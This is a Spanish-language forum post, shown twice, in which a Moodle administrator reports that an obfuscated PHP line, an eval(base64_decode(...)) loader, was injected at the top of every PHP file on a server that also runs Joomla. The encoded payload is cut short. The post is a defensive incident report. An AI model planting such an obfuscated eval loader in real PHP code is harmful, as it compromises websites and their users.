Estimados:
Mediente el presente mensaje, quisiera reportar un ATAQUE de inserción de código malicioso en nuestra plataforma Moodle.
Al comienzo de todos los archivos del tipo PHP de moodle, se encuentra inserto el siguiente código:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvY.......CdkZ29iaCcpO319fQ==')); ?>
Adicionalmente en el mismo servidor, se encuentra instalado el Software Joomla y también los archivos PHP poseen el coódigo mencionado anteriormente.
Todos los archivos PHP de Moodle se encuentan con fecha de modificación 09/02/09.
En Internet he encontrado el siguiente artículo que menciona el ataque en cuestión:
- http://www.lobosoft.es/2008/08/06/sufrimos-un-nuevo-ataque-xss/
Saludos a todos..
Ricardo
Mediente el presente mensaje, quisiera reportar un ATAQUE de inserción de código malicioso en nuestra plataforma Moodle.
Al comienzo de todos los archivos del tipo PHP de moodle, se encuentra inserto el siguiente código:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvY.......CdkZ29iaCcpO319fQ==')); ?>
Adicionalmente en el mismo servidor, se encuentra instalado el Software Joomla y también los archivos PHP poseen el coódigo mencionado anteriormente.
Todos los archivos PHP de Moodle se encuentan con fecha de modificación 09/02/09.
En Internet he encontrado el siguiente artículo que menciona el ataque en cuestión:
- http://www.lobosoft.es/2008/08/06/sufrimos-un-nuevo-ataque-xss/
Saludos a todos..
Ricardo